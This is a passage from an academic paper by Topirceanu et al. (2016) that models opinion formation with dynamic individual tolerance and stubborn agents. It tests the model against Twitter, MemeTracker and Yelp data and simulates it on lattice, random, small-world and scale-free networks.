society. As such, social balancing is defined as the succession of I − F − T phases, whereas social imbalance occurs if either the society does not reach T or, after reaching T, it decays into a T phase. For example, tag 2 (#IranElections) in Fig. 2B has a shorter, more abrupt oscillation. In this case, we consider that the number of opinion sources is not high enough (i.e., above a critical threshold) for social balancing to happen. Tag 2 is an example of social imbalance with a decisive crystallization of just one opinion, as there is no T phase. The averages of opinion change obtained for each considered dataset and for each phase are the following (their representation is given in Fig. 3). Within square brackets are the minimum, maximum and standard deviation for each statistical average: • Twitter: initiation starts at OX = 0 and ends and OX = 33 [0, 39, 9.06], and has an average amplitude OY = 21% [0%, 49%, 5.08]. Fusion happens at OX = 42 and has an amplitude of 100% (i.e., it represents the maximum spike). Tolerance starts on average at OX = 48 (43, end of time series, 4.07), and has an average amplitude OY = 44% [13%, 83%, 4.01]. Intolerance starts on average at OX = 68 (44, end of time series, 26.54), and has an average amplitude OY = 5% [0%, 21%, 4.06]. • MemeTracker: initiation starts at OX = 0 and ends and OX = 37 [0, 40, 6.24], and has an average amplitude OY = 13% [0%, 49%, 10.59]. Fusion happens at OX = 42 and has an amplitude of 100% (i.e., it represents the maximum spike). Tolerance starts on average at OX = 50 (43, end of time series, 4.88), and has an average amplitude OY = 56% [45%, 97%, 3.90]. Intolerance starts on average at OX = 62 (44, end of time series, 17.95), and has an average amplitude OY = 5% [2%, 20%, 3.74]. • Yelp (all measurements are translated to the left on the time axis so that t = 0 coincides with the spike in SA, namely point A): initiation starts at OX = 0 and ends and OX = 2 [0, 6, 2.1], and has an average amplitude OY = 0.34 [0.1, 1.35, 0.14] stars. Fusion Topirceanu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.42 8/33 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.42 Figure 3 The four opinion formation phases represented in terms of: normalized amplitude (number of tweets/maximum number of tweets or opinion change in Yelp/maximum opinion change in stars), with each bar-plot depicting the minimum, maximum and average variation of opinion change; and time duration (on OX time-axis), with each horizontal bar depicting the minimum, maximum dura- tions of the phase (gray), and the time at which it occurs on average (orange). All datasets indicate the same shape of opinion dynamics and the same succession of phases: I-initiation, F-fusion, T-tolerance and T-intolerance. happens at OX = 6 [3, 23] and has an amplitude of OY = 2.25 [0.93, 4.9] stars. Tolerance starts on average at OX = 33 [15, 73], and has an average amplitude OY = 0.475 [0.275, 1.36] stars. Intolerance starts on average at OX = 77 [47, end of time series], and has an average amplitude OY = 0.175 [0.095, 0.46] stars. By corroborating the four obtained intervals, and also by analyzing the shapes rendered in Fig. 3, on both the OX axis (time axis) and OY axis (opinion change), we can conclude that the four phases recurrent in all datasets and, indeed, representative for opinion formation. Topirceanu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.42 9/33 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.42 Phase transition With data from Yelp, we show the effects of a phase transition from social instability to social balancing which can occur when a critical concentration of opinion sources is reached in a social network. Figure 1 highlights the fact that opinion (i.e., the stars given by users to a particular business) stabilizes only after reaching a critical ratio of opinion sources (i.e., votes representing strong opinions). This can be viewed in Fig. 1 at time point OX = 28. We interpret this phenomenon as a rise beyond a σ threshold for the concentration of opinion sources, which determines the social balancing, i.e., the average opinion stabilizes despite of opinion oscillations at local level. Corroborating all these empirical observations with the statistical analysis, we can state that Twitter and MemeTracker illustrate a responsive type of behavior, i.e., an immediate evolution towards the F phase, so a high opinion change is quickly reached for a relatively small ratio σ of opinion sources. This behavior, in turn, correlates well with another study which shows that Twitter online networks have a strong random and small-world component (Duma & Topirceanu, 2014). In contrast, the Yelp dataset can be associated with a saturated type of behavior, as the ratio σ (relative to the maximum number of votes) needed to trigger the phase transition towards social balancing is high in all three cases. Balancing does not occur until a high concentration of opinion sources (we interpret them as similar to opinion-influencing “stubborn agents” (Acemoglu et al., 2013) or “blocked nodes” (Ruan et al., 2015)) are inserted into the social network. New tolerance-based opinion model This section analyzes the characteristics of a new opinion model that can reproduce this kind of real-world phenomena, i.e., the four opinion formation phases and phase transition towards social balancing. Our interaction model is tested on synthetic networks and compared to the empirical data—introduced in the previous section—through qualitative means. In terms of network structure, our analysis includes the basic topologies such as mesh, random (Erdös & Rényi, 1960), small-world (Watts & Strogatz, 1998), and scale-free networks (Barabási & Albert, 1999). Also, based on the last decade of research on realistic social network topology generation which either adds the small-world property to scale-free models (Holme & Kim, 2002; Fu & Liao, 2006; Li, Qian & Wang, 2012), or adds a power-law degree distribution to the small-worlds (Jian-Guo, Yan-Zhong & Zhong-Tuo, 2006; Chen, Zhang & Huang, 2007; Wang & Rong, 2008; Zaidi, 2013), we also consider the Watts–Strogatz with degree distribution (WSDD) (Chen, Zhang & Huang, 2007). In terms of opinion dynamics, we rely on a predictive opinion interaction model that can be classified as being graph- and threshold-based (Guille et al., 2013). Generally speaking, previous models use fixed thresholds (Javarone & Squartini, 2014; Biswas et al., 2011; Li et al., 2012; Das, Gollapudi & Munagala, 2014; Li et al., 2013) or thresholds extracted from real-world examples (Galuba et al., 2010; Saito et al., 2011). However, there are a few models which use dynamic thresholds (Fang, Zhang & Thalmann, 2013; Deng, Liu & Topirceanu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.42 10/33 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.42 Xiong, 2013; Li et al., 2011), but their evolution is not driven by the internal states of the social agents. On the other hand, our empirical references (i.e., Twitter, MemeTracker and Yelp) indicate that opinion does not cease to oscillate and consensus is a rare case in real world. Therefore, we propose an opinion interaction model based on stubborn agents, because it assumes that the society does not reach consensus. Based on recent research on stubborn agents which use a discrete (Yildiz et al., 2013) or continuous (Acemoglu et al., 2013) representation of opinion, we integrate the following opinion models: one-to-one (simple contagion) versus one-to-many diffusion (complex contagion) (Centola & Macy, 2007), and discrete (0 or 1) versus continuous (0–1) opinion representation. By combining opinion representation and opinion diffusion, we obtain 4 distinct models; they are defined in Fig. 4A and exemplified in Figs. 4B and 4C. We build our tolerance-based opinion interaction model by using the SD (1) and SC (2) opinion representations as defined in Fig. 4A. Given a social network G = {V ,E} composed of agents V = {1,2,...,N} and edges E, we define the neighborhood of agent i ∈ V as Ni = { j | (i,j) ∈ E}. The disjoint sets of stubborn agents V0,V1 ∈ V (opinion sources), and null agents Vnull ∈ V (non-participants with no opinion) never change their opinion, while all other (regular) agents V \ {V0 ∪ V1 ∪ Vnull} update their opinion based on the opinion of one or all of their direct neighbors. We use xi(t) to represent the real-time opinion of agent i at time t. Normal (regular) agents can start with a predefined random opinion value xi(0) ∈ [0,1]. The process of changing the opinion of regular agents is triggered according to a Poisson distribution and consists of either adopting the opinion of a randomly chosen direct neighbor, or an averaged opinion of all direct neighbors. We represent with si(t) the discrete opinion of an agent i at moment t having continuous opinion xi(t). In case of the discrete opinion representation SD (1) (Fig. 4A), xi(t) = si(t); in case of the continuous opinion representation SC (2) (Fig. 4A), si(t) is given by Eq. (1). si(t) =   0 if 0 ≤ xi(t) < 0.5 NONE if xi(t) = 0.5 1 if 0.5 < xi(t) ≤ 1. (1) Furthermore, s(t) denotes the average state of the population at a certain time t by averaging the opinion of all individual agents i ∈ V . s(t) = 1 |V |  i∈V si(t). (2) The previous social interaction models (Deffuant et al., 2000; Javarone & Squartini, 2014; Li et al., 2012; Chau et al., 2014; Das, Gollapudi & Munagala, 2014; Fang, Zhang & Thalmann, 2013; Li et al., 2011) do not assign nodes (i.e., individuals or social agents) the basic properties of humans, i.e., humans evolve, learn, react, and adapt in time. The reason for the simplicity behind the existing models is twofold: first, the state-of-the-art Topirceanu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.42 11/33 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.42 Figure 4 The interaction models, based on the two types of opinion representation and two types of diffusion. (A) Taxonomy. (B) Opinion representation types where the larger nodes (labeled with S) represent stubborn agents (or opinion sources) which can also have any value for opinion, with the property that their opinion value never changes. Discrete opinion (left): nodes have opinion 0 (red) or 1 (green) at any time (SD). Continuous opinion (right): nodes have any opinion between 0 and 1, highlighted by the color gradient transitioning from red to green (SC). (C) A scenario highlighting the two opinion diffusion models for discrete representation. Single diffusion (left): the central white node picks one random neighbor and adopts his opinion (SD). Complex diffusion (right): the white node polls all neighbors for their opinion and then adopts an averaged opinion (CD). Note that only direct neighbors can influence opinion, not friends of friends etc. (e.g., the gray node). Topirceanu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.42 12/33 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.42 models are only suited for theoretical contexts so bringing additional complexity to the interaction model would significantly increase the difficulty of mathematical analysis; second, involving measures of human personality (e.g., quantifying an individuals trust, credibility, or emotional state) is a complicated endeavor, in general; this was not the main goal of previous work. Individual tolerance: interpretation and formalism In order to improve the existing opinion interaction model based on a fixed threshold, we consider the evolution of personal traits by taking inspiration from social psychology. As a new contribution to the state-of-the-art, we introduce the concept of tolerance which reflects the individual’s inner state and personal beliefs regarding surrounding opinions. For instance, egocentrism, as it is called in psychology, is highly correlated with individual’s emotional state (Elkind, 1967). We choose to extend this model because the egocentrism-emotional state correlation is a trait that has been shown to influence and evolve with individual opinion (Windschitl et al., 2008). Corroborating literature on attitude certainty (Clarkson et al., 2013), consensus (Clarkson et al., 2013), confirmation bias (Nyhan & Reifler, 2010), social group influ- ence (Roccas & Amit, 2011), and ingroup emotion (Moons et al., 2009), we extrapolate the mechanism that leads to the formation of opinion into a measurable parameter. As such, we define tolerance θ as a parameter that reflects the willingness of an agent to accept new opinions. Similar to real life, individuals with higher tolerance will accept the others opinion easier; thus, this parameter can be defined as a real number 0 ≤ θ ≤ 1. An agent with a tolerance value of 1 is called fully tolerant, whereas an agent with a tolerance of 0 is called fully intolerant (i.e., stubborn agent). Tolerance values which are greater than 0.5 describe a tolerance-inclined agent, while values smaller than 0.5 describe an intolerance-inclined agent. Similar to the threshold-based continuous opinion fluctuation model described by Acemoglu et al. (2013), tolerance can be used as a trust factor for an agent relationship; however, as opposed to the trust factor, tolerance changes its value over time: xi(t) =   0 if i ∈ V0 1 if i ∈ V1 0.5 if i ∈ Vnull θi(t)xj(t) + (1 − θi(t)) xi(t − 1) if j ∈ Ni for t > 0 (3) where the new opinion xi(t) is a weighted sum of the agent’s prior opinion xi(t − 1) and the current opinion xj(t) of one randomly selected direct neighbor. The weights for the two opinions are given by the current tolerance θi(t) of the agent, thus, the extent of how much it can be influenced depends on its internal state. As can be inferred from Eq. (3), the greater the tolerance of an agent, the easier it can accept external opinions from others. At the beginning of the opinion formation process (t = 0), all agents are considered as having a high tolerance (θi(0) = 1), but, as the society evolves, agents become intolerant, therefore segregated in clusters which tend to have Topirceanu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.42 13/33 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.42 a more stable opinion. We further define the tolerance θ of the entire population as a normalized average of all individual tolerances: θ (t) = 1 |V |  i∈V θi(t). (4) We also introduce the concept of opinion change ω as the ratio of agents which have changed their current state (discrete time step t) since the last observation (time t − 1): ω(t) = 1 |V |  i∈V |si(t) − si(t − 1)|. (5) If an agent changes its state from one opinion to another, then the absolute difference |si(t) − si(t − 1)| will be 1; conversely, it will be 0 if the agent state does not change. This change, averaged over all agents at the interaction (discrete) moment t, defines the opinion change of the population ω(t). This metric is used to draw insights regarding the current tolerance level across the entire society. Progressive tolerance model Our model for tolerance evolution stems from the idea that the evolution towards both tolerance and intolerance varies exponentially (Hegselmann & Krause, 2002; Weidlich, 2002), e.g., a person under constant influence becomes convinced at an increased rate over time. If that person faces an opposing opinion, it will eventually start to progressively build confidence in that other opinion. Thus, our proposed progressive model represents the tolerance fluctuation as a non-linear function, unlike other models in literature. For the first time, we integrate these socio-psychological characteristics in the dynamical opinion interaction model; as such, the new tolerance state is obtained as: θi(t) =  max(θi(t − 1) − α0ε0,0) if si(t − 1) = sj(t) min(θi(t − 1) + α1ε1,1) otherwise. (6) In Eq. (6), tolerance decreases by a factor of α0ε0 if the state of the agent before interaction, si(t − 1), is the same as the state of the interacting neighbor (randomly chosen from all direct neighbors) sj(t). If the states are not identical, i.e., the agent comes in contact with an opposite opinion, then the tolerance will increase by a factor of α1ε1. Variable t represents the time step where an opinion update is triggered; these moments are considered as being randomly distributed. The two scaling factors, α0 and α1, both initially set as 1, act as weights (i.e., counters) which are increased to account for every event in which the initiating agent keeps its old opinion (i.e., tolerance decreasing), or changes its old opinion (i.e., tolerance increasing). Therefore, we have: α0 =  α0 + 1 if si(t − 1) = si(t) 1 otherwise (7) α1 =  1 if si(t − 1) = si(t) α1 + 1 otherwise. (8) Topirceanu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.42 14/33 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.42 Figure 5 The tolerance function as defined by the progressive tolerance model. (A) Tolerance scaling: shows how tolerance θ increases with the α1ε1 scaling, as a result of continuous opinion change for an agent i. (B) Intolerance scaling: shows how tolerance θ drops with the α0ε0 scaling, from an initial tolerance θi(0) = 1 to complete intolerance (θi(t) = 0). On even terms with the observation of the majority illusion (Lerman, Yan & Wu, 2015), which explains that globally rare opinions and bias may be strongly present in local neighborhoods as a result of the topology of social networks, we dynamically model bias using the two scaling factors α0 and α1. Whenever an event occurs, the counter corresponding to the other type of event is reset. These factors are used to increase the magnitude of the two tolerance modification ratios ε0 (intolerance modifier weight) and ε1(tolerance modifier weight). The two ratios are chosen with the fixed values of ε0 = 0.002 and ε1 = 0.01. To determine these values, we have tried various ε0:ε1 ratios as follows: if ε0 is increased such that ε0:ε1 = 1:1, most nodes will quickly become intolerant, as opinion will cease to diffuse; conversely, if ε0 is decreased closer to a 1:10 ratio, then the society will become tolerance-inclined, with random opinion fluctuations. The used ε0:ε1 ratio of 1:5 was chosen through consistent experimentation in order to provide a good balance between the deviations towards tolerance and intolerance, respectively. As an illustration of the 1:5 ratio for ε0:ε1, Fig. 5 represents the non-linear tolerance function as implemented in Eq. (6). The displayed examples show that a total of 10 consecutive steps are required to maximize the tolerance if an agent starts with θi(0) = 0.5, because the cumulative sum of θi(0) + ε0  j α0 reaches 1 after 10 iterations. Similarly, in Fig. 5B, the sum θi(0) − ε1  j α1 requires t = 45 iterations to reach intolerance (θi(t) = 0), having started from θi(0) = 1. MODEL VALIDATION Our dynamical opinion model adds significant complexity to the opinion interaction model. Therefore, we use discrete event simulation (SocialSim (Topirceanu & Udrescu, 2014)) over complex social network topologies, in order to validate our model’s capability to reproduce real-world phenomena like the opinion formation phases and the phase transition towards social balancing. An important aspect is that our model is based solely on the simple SD/SC contagion principles. We have also implemented a complex contagion model in SocialSim, and Topirceanu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.42 15/33 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.42 performed extensive simulations to compare it against our simple contagion results and we have found that when using complex contagion, the dynamics of the society is accelerated and the I, F phases occur very fast, the T phase is omitted, and the society enters the intolerance phase. This is due to the fact that averaging the opinion of neighbors does not allow a node to be in contact with the likely divergent opinions of his neighbors, one by one, and thus tolerance cannot increase. As a consequence, nodes tolerance θ will decrease after each interaction. Conceptually, we have defined the tolerance model to keep nodes tolerant through individual interactions which present diversity in opinion, like we would have in real life. Even if humans usually evolve towards the average opinion of their social group, they do so through sequences of individual interactions, as our model tries to capture. Simulation on basic topologies Regular networks The first simulation setup is based on regular topologies, i.e., lattice and mesh. The results show that a homogeneous cluster of stubborn agents divides the overall society opinion (i.e., green (1) vs. red (0)) with a ratio that is directly proportional with their initial distribution. Figure 6 is used as an exemplification of the four phases, as obtained in SocialSim, and shows how a mesh network of 100,000 agents (generated by placing nodes uniformly in a 1,000 by 1,000 unit space and connecting them within a radius of 10 with link probability p = 0.15) evolves under the influence of 64 stubborn agents—32 of each opinion evenly distributed among the population. This way, we observe the same opinion formation phases as identified by our empirical observations: initiation I (Fig. 6A), fusion F (Fig. 6B), tolerance T (Fig. 6C), and intolerance T (Fig. 6D). The situation in Fig. 6C may lead to one of two scenarios: a perpetual (proportional) balance of the two opinions, introduced by us as social balancing (the society remains in the T phase, and T is never reached), or a constant decrease in opinion dynamics which ultimately leads to a stop in opinion change (the society reaches the T phase), as depicted in Fig. 6D. Figure 7 provides illustrative, single experiment results, which intend to capture the specific behavior of opinion evolution. Again, the same patterns were observed throughout all our multiple simulations. Figure 7A illustrates a society which tends towards the tolerance phase T and social balance, by providing the evolution of the overall society state s(t) (as defined in Eq. (2)), tolerance θ (t) (see Eq. (4)), and opinion change ω(t) (Eq. (5)). For the society described in Fig. 7A, the initiation phase I is revealed by the early increase of ω(t), as the number of individuals with opinion increases. The climax of ω(t) represents the fusion phase F. At this stage, there is a maximum number of bordering agents with distinct opinions (a situation that is also depicted in Fig. 6B) and s(t) evens out. In the tolerance phase T, the agents tend to stabilize their opinion, i.e., θ (t) stabilizes and s(t) converges towards the ratio of stubborn agents (which was chosen as 1:1). Another observation is that opinion fluctuation is determined by the stubborn agents density (see Fig. 7B, 7C and 7D). Because of the regular topology, the fewer stubborn agents (regardless of their opinions) there exist in the society, the more the opinion Topirceanu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.42 16/33 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.42 Figure 6 Green (1) vs. red (0) opinion evolution with homogeneous stubborn agent distribution in a 100,000 node social network. The network is initialized with 32 red and 32 green stubborn agents (represented as the darker nodes) which start influencing the neighboring regular agents. Initially, the regular agents have no opinion and are colored with grey. We distinguish between the following phases of opinion formation: (A) the initiation phase I where the society has no opinion, i.e., the stubborn agents exercise their influence to the surrounding neighborhood without being affected by any other opinion. The opinion change ω(t) rises during this phase, whereas tolerance θ (t) remains high. (B) The fusion phase F where the society is now mostly polarized (green or red) and different opinion clusters expand and collapse throughout the society. The opinion change ω(t) reaches a maximum, and tolerance θ (t) begins to slowly decrease. (C) Tolerance phase T, where the cluster interaction stabilizes and new, larger, more stable clusters emerge. Most of the individuals within the society have been in contact with both opinions; each agent’s opinion si(t) begins to converge, and the tolerance θ (t) is steadily declining or becomes stable. (D) Intolerance phase T, where the overall tolerance of agents has decreased to a point where opinion fluctuation ceases and the red opinion becomes dominant (θ (t) < 0.1). The society may or may not reach this phase. Topirceanu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.42 17/33 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.42 Figure 7 Simulation of a 100,000 mesh network with SocialSim (Topirceanu & Udrescu, 2014), display- ing a representative example for the evolution of s(t), θ (t), and ω(t), as well as the opinion evolution s(t) with various stubborn agents distributions. (A) Representative setup for the mesh topology, where the lowest panel displays the opinion change (ω) evolution over three simulation phases: (I) initiation, (F) fusion, and (T) tolerance. The opinion state (s) and its tolerance (θ ) are also displayed in the middle and upper panels. (B) Opinion evolution s(t) with few and evenly distributed stubborn agents SA (1:1 ratio: 1 green, 1 red). (C) Opinion evolution with many and evenly distributed stubborn agents (1:1 ratio: 32 green, 32 red), (D) opinion evolution with few and unevenly distributed stubborn agents (1:4 ratio: 1 green, 4 red). fluctuates. This is explained by the fact that having few stubborn agents means few points of opinion control and stabilization in the local mesh structure; conversely, many stubborn agents make possible the control of more regular agents. Because of this, s(t) may drastically get biased in someone’s favor until the entire society stabilizes (Fig. 7B). Also, due to the small influencing power of a few agents, the opinion will not necessarily stabilize with the same distribution ratio. As expected, the opinion distribution of a society with a high opinion source concentration will tend towards the ratio of the two stubborn agent populations (Fig. 7C). If the ratio of the two stubborn agent populations is not 1:1, then the opinion fluctuation will be around that ratio only during the initiation phase I. Afterwards, the overall opinion will get more biased towards the opinion of the larger stubborn agent population. In Fig. 7D the ratio is 1:4 between green and red stubborn agents, therefore the fluctuation starts around 20% green opinions, but eventually stabilizes at 8%. Topirceanu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.42 18/33 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.42 Figure 8 (A) Representative simulations depicting opinion evolution in networks with 32 uniformly dis- tributed stubborn agents for both competing opinions. (A) An uncorrelated random scale-free network in which opinion constantly oscillates, society becomes balanced and stabilizes in the tolerance phase (T) after going through the initiation (I) and fusion (F) phases. (B) An Erdos–Renyi network in which opinion change is maintained high and opinion presents high oscillations, but the overall state s of the society becomes stable and predictable around 50% (i.e., as expected for a balanced ratio of SAs). The scenarios presented above hold true for lattices. Consequently, these conclusions are more of theoretical interest, as real social networks are typically not organized as such regular topologies. Next, we consider more realistic network topologies. Random networks In order to generate random topologies, we have implemented both Erdos–Renyi networks (Erdös & Rényi, 1960) (see Fig. 8A), as well as uncorrelated networks with preferential attachment (uncorrelated scale-free) as defined by (Catanzaro, Boguna & Pastor-Satorras, 2005) (see Fig. 8B). We create networks of 100,000 nodes with the Erdos–Renyi algorithm (Erdös & Rényi, 1960) with wiring probability p = 10−4, and the algorithm described in Catanzaro, Boguna & Pastor-Satorras (2005) with 10,000 nodes with power-law distributed node degrees within the range 1–100. We use an exponent of γ = −2.41, which is within the power-law interval −3 < γ < −2. Because of the random nature of this second topology, the results obtained with SocialSim are much closer to what we obtain for random networks. Figure 8 represents the opinion formation phases. Due to the disassortative connectivity, opinion dynamics leads to an evolution towards social balance. The explanation for this balancing is due to the the fact that nodes may be connected to any random hubs, so neighboring nodes will not adhere to the same community influenced by the exact same hubs. This diversity in connections keeps tolerance high, so that opinion is kept in balance. Topirceanu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.42 19/33 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.42 Small-world networks By constructing Watts–Strogatz small-world networks of 100,000 nodes (Watts & Strogatz, 1998; Strogatz, 2001; Wang & Chen, 2003; Tsvetovat & Carley, 2005; Chen, Zhang & Huang, 2007; Bandyopadhyay et al., 2011), we show experimentally that a different type of behavior can emerge. Specifically, we used multiple simulation settings with rewiring probabilities p = 0.1, p = 0.2 and p = 0.5 respectively, and keep the results for p = 0.1 as being the most representative, because the clustering coefficient remains high (i.e., 0.368). As such, Figs. 9A and 9B present the society as having a mixed opinions distribution with clusters forming around stubborn agents. Similar to the representation in Fig. 6, this topology allows multiple agents to cluster around the stubborn agents and converge towards their opinion. A higher rewiring parameter p is associated with a more random topology which is found to increase tolerance and dissolve agent clusters around opinion sources. Consequently, this model not only increases the dynamics of opinion fluctuation, but also keeps the society in social balance. The fourth and final phase of opinion evolution—the intolerance phase—does not occur, and opinion change ω(t) is maintained at a (high) constant level. Moreover, the state of the society s(t) is stable. The society depicted in Fig. 9A is homogeneously mixed from an opinion standpoint. Clusters do not form because many agents have long range links to other distant agents whose opinion can be different from the local one. This leads to a perpetual fluctuation which remains in balance. The noticeable effect on a small-world network is that the opinion stabilizes very fast and always at the ratio of the two stubborn agent populations (i.e., 1:1 in our case). In a mesh network, having few stubborn agents leads to an imbalance of opinion, but in the case of small-world topologies, opinion across the entire population always stabilizes. Opinion change ω(t) is also much higher compared to the mesh (i.e., 42% versus 10% under the same conditions) due to the long range links. Networks with preferential attachment We apply the same methodology by constructing a 100,000 node Barabasi–Albert (BA) network with preferential attachment and highlight the unique behavior it enacts (Barabási & Albert, 1999; Pastor-Satorras & Vespignani, 2001; Albert & Barabási, 2002; Wang & Chen, 2003; Song, Havlin & Makse, 2005; Chen, Zhang & Huang, 2007). As Fig. 9C shows, the society does not reach a balance at the expected value (32:32 ⇒ 50%); instead, it gets biased towards one opinion or another. The reason behind this behavior is related to the power-law degree distribution (Wang & Chen, 2003). As such, BA scale-free networks behave more like a tree-structure with hubs rather than as a uniform graph. Indeed, as opinion flows from one agent to another, the higher impact of the hub nodes on the opinion formation at the society level becomes clear. If, for example, a green stubborn agent is placed as the root of a sub-tree filled with red stubborn agents, that sub-tree will never propagate red opinion as it cannot pass through the root and connect with other nodes. Experimentally, this is illustrated in Fig. 9C. The green agents have been placed over nodes with higher degrees, and this can be seen in the evolution of the opinion. There is some initial fluctuation in the society and although the stubborn agent distribution is even, the fluctuation rapidly imbalances as the overall tolerance θ (t) plummets and all Topirceanu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.42 20/33 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.42 Figure 9 Opinion evolution with homogeneous stubborn agent distribution (32:32) in small-world and BA networks. (A) Tolerance phase where visible clusters emerge for small-world networks. (B) For small-world networks, social balancing is attained because tolerance remains extremely high (θ (t) > 90%), opinion change (ω) exhibits the three opinion evolution phases (initiation I, fusion F, and tolerance T), and never reaches intolerance. The state of the society s(t) is stable. (C) Social balancing is not achieved for BA networks: tolerance drops constantly and the society reaches the intolerance phase (T). The state of the society s(t) is unstable during the first three phases of opinion change, then stabilizes as tolerance (θ ) and opinion change (ω) fall. agents become sort of “indoctrinated” by the green opinion. The rapid drop in tolerance coincides with the drop in opinion change ω(t) and the stabilization of the state s(t) at over 90%. Simulations were also run on the WSDD topology (Chen, Zhang & Huang, 2007), which has a strong preferential attachment component, and yield similar results which lead to the same set of observations. We generated the WSDD topology based on 10 Topirceanu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.42 21/33 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.42 Figure 10 Simulation results on a small-world network with 32 red and 32 green stubborn agents for the: (A) fully random interaction model: there are no opinion formation phases, the society is balanced all the time and the opinion has almost no oscillations; (B) random-tolerance interaction model: there are no clear opinion formation phases, the society is balanced all the time, while the opinion has oscillations. communities, each with 1,000 nodes. The nodes are connected with K = 2 neighbors on each side and a rewiring probability p = 0.1. Validation hypotheses In order to strengthen the idea of social balancing, which is observed in our experimental data, we propose to validate the tolerance model against a null/random model. This is addressed by the implementation of random interacting agents in our simulation tool, followed by a replication of the experiments, and a final conclusion. We have added randomness in two ways: • Fully-random interaction model: all agents have random tolerance values, random initial opinions, interact with random neighbors who posses random opinions, and tolerance is updated randomly after each interaction. Looking at the simulation results with random interaction model, we obtain the same output regardless of topology and SA concentration. • Random-tolerance interaction model: similar with our proposed opinion interaction model, but here each agent receives a static tolerance initialized with a random value in the [0,1] interval at startup. Figure 10 depicts a small-world with 32 green and 32 red stubborn agents. The state of the society remains balanced at 50% and there are no visible opinion formation phases. With the random-tolerance interaction model, the state of the society oscillates much more in comparison with the fully random model, but less when compared with our proposed tolerance interaction model. As for the fully-random model, the opinion formation Topirceanu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.42 22/33 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.42 phases are not clear. We can only conclude that using a random/null model for validation shows that tolerance actually plays an important role in the statistical results obtained in our paper. In real-world social networks there are agents which do not hold any opinion, and they simply do not participate the diffusion process. We have covered this scenario in Eq. (1) as an agent which has opinion x(t) = 0.5 will carry the state NONE. These agents are called null agents (NA) and do not take part in the opinion interaction. Theoretically, we consider that NAs should act like edge-disconnections in the graph. By adding NAs in SocialSim, we were able to test them with all our synthetic topologies. The higher the population of randomly distributed NAs, the fuzzier the four phases become. Initiation (I) is less steeper, fusion (F) isn’t that spiky anymore, tolerance (T) is achieved harder/later as the state oscillates more, but the society is still in balance and predictable; opinion change stabilizes with some delay. The phases tend to dissolve after a concentration of approximately 30% population of null agents. Additional simulations have been run with NAs and all obtained results lead to the same observations as those presented in Figs. 11A–11F. All tests from Fig. 11 were run on small-worlds with 10,000 nodes. In reference Acemoglu et al. (2013) the authors try to solve the equations that describe the stationarity of opinion evolution by using random walks from regular agents to stubborn agents which influence their state. Even if their model is simpler than the model proposed in our paper, they have to come up with some simplifying assumptions in terms of network topology (only regular topologies are tractable) and number of agents (they solve equations on small networks and then generalize the results in a qualitative discussion). Because our paper adds significant complexity to the model (i.e., node tolerance is not a fixed threshold, but a dynamic one which depends on the interactions with neighbors), solving the stationarity equations would require even stronger simplifying assumptions. This is the reason for using simulation in order to analyze the stationarity distribution. Nonetheless, in all simulation scenarios, the obtained stationarity described in the paper coincides with one of two (mutually exclusive) cases: • The society reaches intolerance as overall tolerance converges towards 0 (i.e., θ (t) ≃ 0 for t → ∞). When this happens, no further modifications to the state of the society can be achieved. We obtain this behavior on mesh and BA topologies. Meshes imply only local connectivity to neighbors that converge towards a similar state, thus tolerance is bound to decrease to 0 (see Fig. 7A). BA networks imply connections to hub nodes, which means that all neighbors are influenced by the same local hubs, which in turn decreases tolerance to 0 (see Fig. 9C). Such a situation, in the case of regular small networks, was already mathematically described by Acemoglu et al. (2013). The authors measure the probability of being influenced by a SA using random walks. In our case, Eq. (3) can be simplified, for the majority of nodes with θi(t) ≃ 0, to: xi(t) = xi(t − 1), so the state of the society becomes stable. • The society remains in social balance, as the overall tolerance converges towards a non-zero constant in time (i.e., θ (t) > 0 for t → ∞), which causes the state and opinion Topirceanu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.42 23/33 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.42 Figure 11 Simulation results for the tolerance-based opinion interaction on a small-world network with 10,000 nodes, of which are 32 green SAs and 32 red SAs. The social network consists of (A) 20% null agents, (B) 30% null agents, (C) 40% null agents, (D) 80% null agents. change to also stabilize (for t → ∞). We obtain this phenomenon on random and small-world topologies. Small-worlds have the unique feature of being both regular and random in a proportion p, given by the rewiring parameter of the Watts–Strogatz algorithm. Thus, nodes interact with equal probability (for p = 0.5, as used in our experiments) with neighbors with similar opinion, and with distant random nodes with different opinion. A proportional value p = 0.5 will keep tolerance at maximal value as can be seen in Fig. 9B. Due to the random distribution of initial opinion and links (in random networks and small-worlds with p = 0.5), nodes will oscillate ergodically, and both Eqs. (7) and (8) will be activated with relatively equal probability. This keeps the tolerance variation of each node around a certain convergence value: θi(t) = 